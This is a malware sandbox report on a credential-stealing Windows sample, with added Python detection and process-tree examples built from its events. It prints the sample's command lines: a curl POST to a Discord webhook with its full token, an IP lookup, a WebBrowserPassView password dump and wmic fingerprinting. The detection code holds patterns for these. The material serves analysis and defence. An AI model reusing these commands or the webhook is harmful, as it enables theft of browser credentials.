DYNAMIC ANALYSIS REPORT #928218
Classifications: PUA Spyware
Verdict: MALICIOUS
Threat Names: App/Generic-JJ, Gen:Variant.Razy.680050, Gen:Variant.Agentus.62, Gen:Application.Heur.yq0@kibVd8eO
Verdict Reason: -
Sample Type Windows Exe (x86-32)
Sample Name Project_Genocide_V5.1.1-.exe
ID #303998
MD5 2f0909140e6006b3682bf2de804021e9
SHA1 eb9a6c6152d25c53a7a6098280e1be2dcc7146c7
SHA256 129fd5ce9840c318148335527b70b1a6b8df1e1c0005f24d06b28130df7ed056
File Size 13847.00 KB
Report Created 2021-03-23 13:29 (UTC+1)
Target Environment win10_64_th2_en_mso2016 | exe
X-Ray Vision for Malware - www.vmray.com 1 / 55 DYNAMIC ANALYSIS REPORT #928218
OVERVIEW
VMRay Threat Identifiers (22 rules, 53 matches)
Score Category Operation Count Classification
5/5 Data Collection Tries to read cached credentials of various applications 1 Spyware
• Tries to read sensitive data of: Opera, Mozilla Firefox, Internet Explorer, Yandex Browser, Vivaldi, SeaMonkey, Internet Explorer / Edge, Safari.
4/5 Antivirus Malicious content was detected by heuristic scan 2 -
• Built-in AV detected the sample itself as "Gen:Variant.Razy.680050".
• Built-in AV detected the dropped file C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe as "Gen:Variant.Agentus.62".
2/5 Data Collection Reads sensitive browser data 8 -
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by registry.
• (Process #13) webbrowserpassview.exe tries to read credentials of web browser "Internet Explorer" by reading from the system's credential vault.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Mozilla Firefox" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Yandex Browser" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Vivaldi" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Safari" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Opera" by file.
2/5 Data Collection Reads sensitive application data 1 -
• (Process #13) webbrowserpassview.exe tries to read sensitive data of application "SeaMonkey" by file.
2/5 Discovery Executes WMI query 3 -
• (Process #32) wmic.exe executes WMI query: SELECT Size FROM Win32_DiskDrive.
• (Process #35) wmic.exe executes WMI query: SELECT SerialNumber FROM Win32_BIOS.
• (Process #36) wmic.exe executes WMI query: SELECT Name FROM WIN32_PROCESSOR.
2/5 Discovery Collects hardware properties 2 -
• (Process #32) wmic.exe queries hardware properties via WMI.
• (Process #36) wmic.exe queries hardware properties via WMI.
2/5 Discovery Collects BIOS properties 1 -
• (Process #35) wmic.exe queries BIOS properties via WMI.
2/5 Network Connection Sets up server that accepts incoming connections 3 -
• (Process #11) curl.exe starts a TCP server listening on localhost port 49720.
• (Process #12) curl.exe starts a TCP server listening on localhost port 49725.
• (Process #37) curl.exe starts a TCP server listening on localhost port 49720.
2/5 Reputation Known suspicious file 1 PUA
• Reputation analysis labels file "C:\temp\WebBrowserPassView.exe" as "App/Generic-JJ".
2/5 Antivirus Suspicious content was detected by heuristic scan 1 -
• Built-in AV detected the dropped file C:\temp\WebBrowserPassView.exe as "Gen:Application.Heur.yq0@kibVd8eO".
2/5 YARA Suspicious content matched by YARA rules 1 -
• Rule "PowerShell_Registry_Commands" from ruleset "Generic" has matched on the dropped file "C:\temp\finalres.vbs".
1/5 Privilege Escalation Enables process privilege 4 -
• (Process #2) khaaksqr.exe enables process privilege "SeDebugPrivilege".
• (Process #32) wmic.exe enables process privilege "SeDebugPrivilege".
• (Process #35) wmic.exe enables process privilege "SeDebugPrivilege".
• (Process #36) wmic.exe enables process privilege "SeDebugPrivilege".
1/5 Discovery Reads system data 1 Spyware
• (Process #7) wscript.exe reads Windows license key from registry.
1/5 Hide Tracks Creates process with hidden window 1 -
• (Process #7) wscript.exe starts (process #8) wscript.exe with a hidden window.
1/5 Discovery Enumerates running processes 1 -
• (Process #13) webbrowserpassview.exe enumerates running processes.
1/5 Discovery Possibly does reconnaissance 2 -
• (Process #13) webbrowserpassview.exe tries to gather information about application "Mozilla Firefox" by file.
• (Process #13) webbrowserpassview.exe tries to gather information about application "SeaMonkey" by file.
1/5 Network Connection Performs DNS request 6 -
• (Process #2) khaaksqr.exe resolves host name "cdn.discordapp.com" to IP "162.159.130.233".
• (Process #2) khaaksqr.exe resolves host name "raw.githubusercontent.com" to IP "185.199.109.133".
• (Process #2) khaaksqr.exe resolves host name "github.com" to IP "140.82.121.4".
• (Process #11) curl.exe resolves host name "discordapp.com" to IP "162.159.130.233".
• (Process #12) curl.exe resolves host name "myexternalip.com" to IP "216.239.34.21".
• (Process #37) curl.exe resolves host name "discordapp.com" to IP "162.159.130.233".
1/5 Network Connection Connects to remote host 6 -
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "185.199.109.133:443".
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "162.159.130.233:443".
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "140.82.121.4:443".
• (Process #11) curl.exe opens an outgoing TCP connection to host "162.159.130.233:443".
• (Process #12) curl.exe opens an outgoing TCP connection to host "216.239.34.21:443".
• (Process #37) curl.exe opens an outgoing TCP connection to host "162.159.130.233:443".
1/5 Crash A monitored process crashed 1 -
• (Process #38) filed.exe crashed.
1/5 Obfuscation Resolves API functions dynamically 1 -
• (Process #13) webbrowserpassview.exe resolves 38 API functions by name.
1/5 Execution Drops PE file 3 -
• (Process #1) project_genocide_v5.1.1-.exe drops file "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe".
• (Process #2) khaaksqr.exe drops file "C:\temp\WebBrowserPassView.exe".
• (Process #2) khaaksqr.exe drops file "C:\temp\curl.exe".
1/5 Execution Executes dropped PE file 3 -
• Executes dropped file "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe".
• Executes dropped file "C:\temp\WebBrowserPassView.exe".
• Executes dropped file "C:\temp\curl.exe".
- Trusted Known clean file 2 -
• File "C:\temp\curl-ca-bundle.crt" is a known clean file.
• File "C:/temp/RDhJ0CNFevzX_Passwords.txt" is a known clean file.
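As an added example that is not part of the VMRay report, the detection logic a SOC engineer could derive from the identifiers above, run over process-creation events. The events below are constructed by hand from the command lines and PIDs this report lists (they are not sandbox output); the rule names, the weights, the IP-lookup domains other than myexternalip.com and the NirSoft output switches other than /stext are this example's own assumptions.

```python
"""Process-creation detection logic modelled on this report: curl.exe posting
to a Discord webhook, an external-IP lookup, NirSoft WebBrowserPassView writing
credentials with /stext, wmic hardware fingerprinting and wscript.exe running
scripts out of C:\\temp.  SAMPLE_EVENTS is hand-built from the report, not sandbox output."""
import re
from typing import Dict, List, Tuple

# (rule, weight, image regex, command-line regex), all matched case-insensitively.
# The weights, the IP-lookup domains other than myexternalip.com and the NirSoft
# switches other than /stext are this example's assumptions, not report findings.
RULES: List[Tuple[str, int, str, str]] = [
    ("discord_webhook_post", 5, r"",
     r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"),
    ("external_ip_lookup", 2, r"",
     r"https?://(?:www\.)?(?:myexternalip\.com|api\.ipify\.org|icanhazip\.com|ifconfig\.me)\b"),
    ("nirsoft_passview_dump", 5, r"(?:^|[\\/])webbrowserpassview\.exe$",
     r"(?:^|\s)/s(?:text|html|xml|csv|tab|ver)\b"),
    ("wmic_hw_fingerprint", 2, r"(?:^|[\\/])wmic\.exe$",
     r"\b(?:bios\s+get\s+serialnumber|diskdrive\s+get\s+size|cpu\s+get\s+name)\b"),
    ("script_host_from_temp", 1, r"(?:^|[\\/])[wc]script\.exe$",
     r'\\temp\\[^\s"]+\.(?:vbs|vbe|js|jse|wsf)\b'),
]
WEBHOOK_RE = re.compile(r"discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)", re.I)

WEBHOOK = ("https://discordapp.com/api/webhooks/823564721483284501/"
           "QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T")
CURL, WMIC = r"C:\temp\curl.exe", r"C:\Windows\System32\wbem\WMIC.exe"
POST = 'C:/temp/curl -X POST -H "Content-type: application/json" --data '
SAMPLE_EVENTS: List[dict] = [  # pid / ppid / image / cmdline as listed in the report
    {"pid": 2404, "ppid": 3668, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"'},
    {"pid": 2512, "ppid": 2404, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"'},
    {"pid": 4936, "ppid": 2512, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "'},
    {"pid": 1124, "ppid": 4936, "image": CURL,
     "cmdline": POST + r'"{\"content\": \"**INJECTION STARTED!**\"}" ' + WEBHOOK},
    {"pid": 5080, "ppid": 4936, "image": CURL, "cmdline": 'C:/temp/curl "https://myexternalip.com/raw"'},
    {"pid": 3432, "ppid": 4936, "image": r"C:\temp\WebBrowserPassView.exe",
     "cmdline": 'C:/temp/WebBrowserPassView.exe /stext "C:/temp/RDhJ0CNFevzX_Passwords.txt"'},
    {"pid": 3608, "ppid": 4936, "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"pid": 1852, "ppid": 4936, "image": r"C:\Windows\System32\findstr.exe", "cmdline": 'findstr /c:"Host Name"'},
    {"pid": 1320, "ppid": 4936, "image": WMIC, "cmdline": "wmic diskdrive get size"},
    {"pid": 4944, "ppid": 4936, "image": WMIC, "cmdline": "wmic bios get serialnumber"},
    {"pid": 3020, "ppid": 4936, "image": WMIC, "cmdline": "wmic cpu get name"},
    # the report truncates this body ("......"); a shortened stand-in is used here
    {"pid": 1056, "ppid": 4936, "image": CURL,
     "cmdline": POST + r'"{\"content\": \"**RDhJ0CNFevzX**\"}" ' + WEBHOOK},
    {"pid": 7777, "ppid": 1000, "image": r"C:\Windows\System32\notepad.exe",  # constructed benign control
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\temp\notes.txt'},
]

def evaluate(event: dict) -> List[Tuple[str, int]]:
    """Return the (rule, weight) pairs that fire on one process-creation event."""
    image, cmdline = event.get("image", ""), event.get("cmdline", "")
    return [(name, weight) for name, weight, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]

def triage(events: List[dict]) -> Dict[int, dict]:
    """pid -> {"score", "rules"} for every event on which at least one rule fired."""
    result: Dict[int, dict] = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            result[ev["pid"]] = {"score": sum(w for _, w in hits),
                                 "rules": [n for n, _ in hits]}
    return result

def score_by_parent(events: List[dict]) -> Dict[int, int]:
    """Roll child scores up to the parent PID: wmic fingerprinting and an IP lookup
    are weak alone, but one cmd.exe that spawns all of them is a strong signal."""
    totals: Dict[int, int] = {}
    for ev in events:
        score = sum(w for _, w in evaluate(ev))
        if score:
            totals[ev["ppid"]] = totals.get(ev["ppid"], 0) + score
    return totals

def webhook_iocs(events: List[dict]) -> List[Tuple[str, str]]:
    """Unique (webhook id, token) pairs seen in any command line; the id is the
    stable IOC to hunt on across samples that rotate the token."""
    found: List[Tuple[str, str]] = []
    for ev in events:
        for m in WEBHOOK_RE.finditer(ev.get("cmdline", "")):
            if (m.group(1), m.group(2)) not in found:
                found.append((m.group(1), m.group(2)))
    return found

if __name__ == "__main__":
    for pid, info in triage(SAMPLE_EVENTS).items():
        print(pid, info["score"], ",".join(info["rules"]))
    print("by parent:", score_by_parent(SAMPLE_EVENTS), "webhooks:", webhook_iocs(SAMPLE_EVENTS))
```

Run stand-alone it prints one line per flagged PID. The roll-up in score_by_parent is the part worth copying into a real pipeline: the cmd.exe that runs finalres.bat never triggers a rule itself, yet it ends up with a higher aggregate score than any single child because every discovery, collection and exfiltration process in this report is its direct child.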
Mitre ATT&CK Matrix
Tactic | Technique
Discovery | T1082 System Information Discovery
Discovery | T1012 Query Registry
Defense Evasion | T1143 Hidden Window
Collection | T1119 Automated Collection
Credential Access | T1081 Credentials in Files
Discovery | T1083 File and Directory Discovery
Collection | T1005 Data from Local System
Discovery | T1057 Process Discovery
Credential Access | T1214 Credentials in Registry
Discovery | T1217 Browser Bookmark Discovery
Credential Access | T1003 Credential Dumping
Execution | T1047 Windows Management Instrumentation
Defense Evasion | T1045 Software Packing
No techniques were mapped to Initial Access, Persistence, Privilege Escalation, Lateral Movement, Command and Control, Exfiltration or Impact.
Sample Information
ID 928218
MD5 2f0909140e6006b3682bf2de804021e9
SHA1 eb9a6c6152d25c53a7a6098280e1be2dcc7146c7
SHA256 129fd5ce9840c318148335527b70b1a6b8df1e1c0005f24d06b28130df7ed056
SSDeep 393216:8wM8oimwZaeuQs+UbbjIMzXTTPBrX3aNl4C:8whTZNuQMs8TTB7KNl9
ImpHash f34d5f2d4577ed6d9ceec516c1f5a744
Filename Project_Genocide_V5.1.1-.exe
File Size 13847.00 KB
Sample Type Windows Exe (x86-32)
Has Macros
Analysis Information
Creation Time 2021-03-23 13:29 (UTC+1)
Analysis Duration 00:04:00
Termination Reason Timeout
Number of Monitored Processes 33
Execution Successful False
Reputation Analysis Enabled
WHOIS Enabled
Built-in AV Enabled
Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches 3
YARA Enabled
YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches 1
Screenshots truncated.
NETWORK
General
7.34 KB total sent
2301.81 KB total received
7 ports 49737, 49739, 49720, 49722, 443, 49725, 49727
6 contacted IP addresses
2 URLs extracted
0 files downloaded
0 malicious hosts detected
DNS
6 DNS requests for 5 domains
1 nameservers contacted
0 total requests returned errors
HTTP/S
0 URLs contacted, 2 servers
3 sessions, 2.98 KB sent, 2290.18 KB received
DNS Requests
Type | Hostname | Response Code | Resolved IPs | CNames | Verdict
A | cdn.discordapp.com | NoError | 162.159.130.233, 162.159.133.233, 162.159.135.233, 162.159.129.233, 162.159.134.233 | N/A |
A | raw.githubusercontent.com | NoError | 185.199.109.133, 185.199.108.133, 185.199.111.133, 185.199.110.133 | N/A |
A | github.com | NoError | 140.82.121.4 | N/A |
A | discordapp.com | NoError | 162.159.130.233, 162.159.135.233, 162.159.133.233, 162.159.129.233, 162.159.134.233 | N/A |
A | myexternalip.com | NoError | 216.239.34.21, 216.239.32.21, 216.239.36.21, 216.239.38.21 | N/A |
HTTP Requests
Method | URL | Dest. IP | Dest. Port | Status Code | Response Size | Verdict
- | https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T | - | - | - | 0 bytes | N/A
- | https://myexternalip.com/raw | - | - | - | 0 bytes | N/A
(Both URLs were extracted from curl.exe command lines; the sessions ran over TLS on port 443, and the report records no method, destination or status code for them.)
BEHAVIOR
Process Graph
All edges are Child Process unless labelled otherwise; the tree follows the PID / Parent PID fields of the per-process sections below.

#1 project_genocide_v5.1.1-.exe (Sample Start)
    #2 khaaksqr.exe
        #7 wscript.exe
            #8 wscript.exe
                #9 cmd.exe
                    #11 curl.exe
                    #12 curl.exe
                    #13 webbrowserpassview.exe
                    #14 systeminfo.exe
                    #15 findstr.exe
                    #18 systeminfo.exe
                    #19 findstr.exe
                    #20 systeminfo.exe
                    #21 findstr.exe
                    #22 systeminfo.exe
                    #23 findstr.exe
                    #24 systeminfo.exe
                    #25 findstr.exe
                    #26 systeminfo.exe
                    #27 findstr.exe
                    #28 systeminfo.exe
                    #29 findstr.exe
                    #30 systeminfo.exe
                    #31 findstr.exe
                    #32 wmic.exe
                    #35 wmic.exe
                    #36 wmic.exe
                    #37 curl.exe
                    #38 filed.exe
                        #39 werfault.exe
                        #40 filed.exe
                    #42 timeout.exe
    #3 openwith.exe (RPC Server edge from #1; its process parent, PID 636, is not a monitored process)
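The graph above rebuilt in code, as an added example rather than anything produced by VMRay: it reconstructs the tree from the PID / Parent PID fields of the process sections that follow and answers the ancestry question an analyst asks first, namely which processes descend from the script host. The tuple list is transcribed from the report (the repeated systeminfo/findstr pairs #18 to #31, all children of cmd.exe, are left out); the class and method names are this example's own.

```python
"""Rebuild this report's process tree from the PID / Parent PID fields of the
per-process sections and answer ancestry questions about it.  PROCS is
transcribed from the report (the systeminfo/findstr pairs #18-#31, all
children of cmd.exe, are omitted); nothing here is VMRay output."""
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# (report process id, image name, pid, parent pid)
PROCS: List[Tuple[int, str, int, int]] = [
    (1, "project_genocide_v5.1.1-.exe", 1440, 2104),
    (2, "khaaksqr.exe", 3668, 1440),
    (3, "openwith.exe", 852, 636),   # parent 636 is not a monitored process
    (7, "wscript.exe", 2404, 3668),
    (8, "wscript.exe", 2512, 2404),
    (9, "cmd.exe", 4936, 2512),
    (11, "curl.exe", 1124, 4936),
    (12, "curl.exe", 5080, 4936),
    (13, "webbrowserpassview.exe", 3432, 4936),
    (14, "systeminfo.exe", 3608, 4936),
    (15, "findstr.exe", 1852, 4936),
    (32, "wmic.exe", 1320, 4936),
    (35, "wmic.exe", 4944, 4936),
    (36, "wmic.exe", 3020, 4936),
    (37, "curl.exe", 1056, 4936),
    (38, "filed.exe", 1428, 4936),
    (39, "werfault.exe", 2268, 1428),
    (40, "filed.exe", 3336, 1428),
    (42, "timeout.exe", 1988, 4936),
]


class ProcessTree:
    def __init__(self, procs: List[Tuple[int, str, int, int]]) -> None:
        self.name: Dict[int, str] = {pid: name for _, name, pid, _ in procs}
        self.parent: Dict[int, int] = {pid: ppid for _, _, pid, ppid in procs}
        self.children: Dict[int, List[int]] = defaultdict(list)
        for _, _, pid, ppid in procs:
            self.children[ppid].append(pid)

    def roots(self) -> List[int]:
        """PIDs whose parent was never monitored: the sample itself and openwith.exe."""
        return [pid for pid, ppid in self.parent.items() if ppid not in self.name]

    def ancestry(self, pid: int) -> List[str]:
        """Image names from the top-most monitored ancestor down to pid."""
        chain: List[str] = []
        seen = set()
        while pid in self.name and pid not in seen:   # `seen` guards against a PPID loop
            seen.add(pid)
            chain.append(self.name[pid])
            pid = self.parent[pid]
        return chain[::-1]

    def descendants_of(self, ancestor: str, target: str) -> List[int]:
        """PIDs running `target` that have `ancestor` somewhere above them."""
        return sorted(pid for pid, name in self.name.items()
                      if name == target and ancestor in self.ancestry(pid)[:-1])

    def render(self, pid: Optional[int] = None, depth: int = 0) -> List[str]:
        """Indented text tree, one line per process, starting at the roots."""
        lines: List[str] = []
        for node in ([pid] if pid is not None else self.roots()):
            lines.append("  " * depth + f"{self.name[node]} (pid {node})")
            for child in self.children[node]:
                lines.extend(self.render(child, depth + 1))
        return lines


if __name__ == "__main__":
    tree = ProcessTree(PROCS)
    print("\n".join(tree.render()))
    print("curl.exe under a script host:", tree.descendants_of("wscript.exe", "curl.exe"))
    print("chain to pid 1124:", " > ".join(tree.ancestry(1124)))
```

The same ancestry walk is what a hunting query over Sysmon or EDR process events needs: a curl.exe whose lineage contains wscript.exe and cmd.exe is the detectable shape of this sample, independent of the file names it drops.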
Process #1: project_genocide_v5.1.1-.exe
ID 1
Filename c:\users\rdhj0cnfevzx\desktop\project_genocide_v5.1.1-.exe
Command Line "C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 73164, Reason: Analysis Target
Unmonitor End Time End Time: 141669, Reason: Terminated
Monitor Duration 68.50s
Return Code 0
PID 1440
Parent PID 2104
Bitness 64 Bit
Dropped Files (2)
Filename | File Size | SHA256 | YARA Match
C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe | 10.00 KB | d4bde482cc419f200f9f3a2fb284f3ead1ed3c5fe9e8581dbe4acbce68f8b11e |
C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Jmbwoud.rar | 10240.00 KB | 7001466b051e89556abb7f438c9b9cafba66a5d121de17082bd6423b7333e3aa |
Host Behavior
Type Count
Module 18
System 3
Window 3
Registry 3
File 9
Process 2
Process #2: khaaksqr.exe
ID 2
Filename c:\users\rdhj0cnfevzx\appdata\local\temp\khaaksqr.exe
Command Line "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 117521, Reason: Child Process
Unmonitor End Time End Time: 155737, Reason: Terminated
Monitor Duration 38.22s
Return Code 0
PID 3668
Parent PID 1440
Bitness 64 Bit
Dropped Files (6)
Filename | File Size | SHA256 | YARA Match
C:\temp\finalres.bat | 3.93 KB | 32bc4c92173d817cb245c95505b26304e3c242ab1ba77bcce003727e6edecb29 |
C:\temp\finalres.vbs | 2.21 KB | f76ba0c9cc7614a11a7e1217e2e738196d6da56dec9c96f90a8a64d9f80a4493 |
C:\temp\finalres2.vbs | 344 bytes | 04084885435b6134e792c03f8b52bf6ea7135c7bd7ff8d3cc3aaedae2c667dae |
C:\temp\WebBrowserPassView.exe | 391.50 KB | f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe |
C:\temp\curl-ca-bundle.crt | 216.96 KB | 2782f0f8e89c786f40240fc1916677be660fb8d8e25dede50c9f6f7b0c2c2178 |
C:\temp\curl.exe | 4256.62 KB | 2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338 |
Host Behavior
Type Count
File 420
System 12
Process 1
Registry 27
- 10
Environment 8
Module 7
User 1
Network Behavior
Type Count
DNS 3
TCP 3
Process #3: openwith.exe
ID 3
Filename c:\windows\system32\openwith.exe
Command Line C:\Windows\system32\OpenWith.exe -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 122651, Reason: RPC Server
Unmonitor End Time End Time: 260366, Reason: Terminated
Monitor Duration 137.72s
Return Code 0
PID 852
Parent PID 636
Bitness 64 Bit
Host Behavior
Type Count
COM 1
Process #7: wscript.exe
ID 7
Filename c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 150278, Reason: Child Process
Unmonitor End Time End Time: 156691, Reason: Terminated
Monitor Duration 6.41s
Return Code 0
PID 2404
Parent PID 3668
Bitness 64 Bit
Dropped Files (1)
Filename | File Size | SHA256 | YARA Match
C:\temp\WindowsInfo.txt | 113 bytes | 9313c411f761f8215e7e73f7dc3486f5d10b8556a1164c3277791e312a80b686 |
Host Behavior
Type Count
System 6
Module 20
COM 8
File 4
Registry 9
Process 1
Process #8: wscript.exe
ID 8
Filename c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 154806, Reason: Child Process
Unmonitor End Time End Time: 158082, Reason: Terminated
Monitor Duration 3.28s
Return Code 0
PID 2512
Parent PID 2404
Bitness 64 Bit
Host Behavior
Type Count
System 6
Module 14
COM 6
File 4
Process 1
Process #9: cmd.exe
ID 9
Filename c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 155960, Reason: Child Process
Unmonitor End Time End Time: 269129, Reason: Terminated
Monitor Duration 113.17s
Return Code 1
PID 4936
Parent PID 2512
Bitness 64 Bit
Dropped Files (2)
Filename | File Size | SHA256 | YARA Match
C:\temp\ip_address.txt | 12 bytes | fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c94bfd7a7c59543772b585d9a1 |
C:\temp\System_INFO.txt | 678 bytes | 05925f6e122be36382458c1668c4b40c16809b3e2ad5e65fde35f9ad52cef072 |
Host Behavior
Type Count
Module 1
File 899
Environment 206
Process 25
- 1
System 2
Process #11: curl.exe
ID 11
Filename c:\temp\curl.exe
Command Line C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 159008, Reason: Child Process
Unmonitor End Time End Time: 162988, Reason: Terminated
Monitor Duration 3.98s
Return Code 0
PID 1124
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 21
File 13
Module 14
System 134
Network Behavior
Type Count
DNS 1
TCP 3
Process #12: curl.exe
ID 12
Filename c:\temp\curl.exe
Command Line C:/temp/curl "https://myexternalip.com/raw"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 162019, Reason: Child Process
Unmonitor End Time End Time: 166972, Reason: Terminated
Monitor Duration 4.95s
Return Code 0
PID 5080
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 20
File 567
Module 14
System 76
Network Behavior
Type Count
DNS 1
TCP 3
Process #13: webbrowserpassview.exe
ID 13
Filename c:\temp\webbrowserpassview.exe
Command Line C:/temp/WebBrowserPassView.exe /stext "C:/temp/RDhJ0CNFevzX_Passwords.txt"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 163742, Reason: Child Process
Unmonitor End Time End Time: 210549, Reason: Terminated
Monitor Duration 46.81s
Return Code 0
PID 3432
Parent PID 4936
Bitness 32 Bit
Dropped Files (1)
Filename | File Size | SHA256 | YARA Match
C:/temp/RDhJ0CNFevzX_Passwords.txt | 2 bytes | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
Host Behavior
Type Count
Module 288
System 6
File 16
- 30
Process 446
Registry 1
Process #14: systeminfo.exe
ID 14
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 186721, Reason: Child Process
Unmonitor End Time End Time: 216942, Reason: Terminated
Monitor Duration 30.22s
Return Code 0
PID 3608
Parent PID 4936
Bitness 64 Bit
Process #15: findstr.exe
ID 15
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Host Name"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 194852, Reason: Child Process
Unmonitor End Time End Time: 216710, Reason: Terminated
Monitor Duration 21.86s
Return Code 0
PID 1852
Parent PID 4936
Bitness 64 Bit
Process #18: systeminfo.exe
ID 18
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 215967, Reason: Child Process
Unmonitor End Time End Time: 219276, Reason: Terminated
Monitor Duration 3.31s
Return Code 0
PID 3016
Parent PID 4936
Bitness 64 Bit
Process #19: findstr.exe
ID 19
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Domain"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 216016, Reason: Child Process
Unmonitor End Time End Time: 220142, Reason: Terminated
Monitor Duration 4.13s
Return Code 0
PID 4120
Parent PID 4936
Bitness 64 Bit
Process #20: systeminfo.exe
ID 20
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 218466, Reason: Child Process
Unmonitor End Time End Time: 221953, Reason: Terminated
Monitor Duration 3.49s
Return Code 0
PID 4204
Parent PID 4936
Bitness 64 Bit
Process #21: findstr.exe
ID 21
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"OS Name"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 218580, Reason: Child Process
Unmonitor End Time End Time: 222054, Reason: Terminated
Monitor Duration 3.47s
Return Code 0
PID 4244
Parent PID 4936
Bitness 64 Bit
Process #22: systeminfo.exe
ID 22
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 221064, Reason: Child Process
Unmonitor End Time End Time: 224559, Reason: Terminated
Monitor Duration 3.50s
Return Code 0
PID 4312
Parent PID 4936
Bitness 64 Bit
Process #23: findstr.exe
ID 23
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"OS Version"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 221276, Reason: Child Process
Unmonitor End Time End Time: 224565, Reason: Terminated
Monitor Duration 3.29s
Return Code 0
PID 4360
Parent PID 4936
Bitness 64 Bit
Process #24: systeminfo.exe
ID 24
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 224027, Reason: Child Process
Unmonitor End Time End Time: 227288, Reason: Terminated
Monitor Duration 3.26s
Return Code 0
PID 4476
Parent PID 4936
Bitness 64 Bit
Process #25: findstr.exe
ID 25
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System Manufacturer"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 224203, Reason: Child Process
